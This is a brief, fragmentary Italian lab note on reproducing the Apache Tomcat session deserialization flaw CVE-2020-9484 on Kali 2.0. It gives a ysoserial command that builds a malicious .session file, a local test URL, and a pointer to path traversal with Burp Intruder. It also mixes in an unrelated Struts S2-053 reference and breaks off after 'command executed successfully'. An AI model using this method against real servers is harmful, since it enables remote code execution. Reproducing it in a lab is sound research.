
Riprodurre la vulnerabilità di esecuzione di codice tramite deserializzazione della sessione di Apache Tomcat utilizzando Kali 2.0
Riproduzione della vulnerabilità di deserializzazione di Apache Tomcat Session CVE-2020-9484 con Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Prima accedi a S2-053 per verificare se l'avvio è normale:
http://192.168.152.128:8080/s2-053/
Riapri e cattura i pacchetti, utilizza intruder per il path traversal


Comando eseguito con successo:
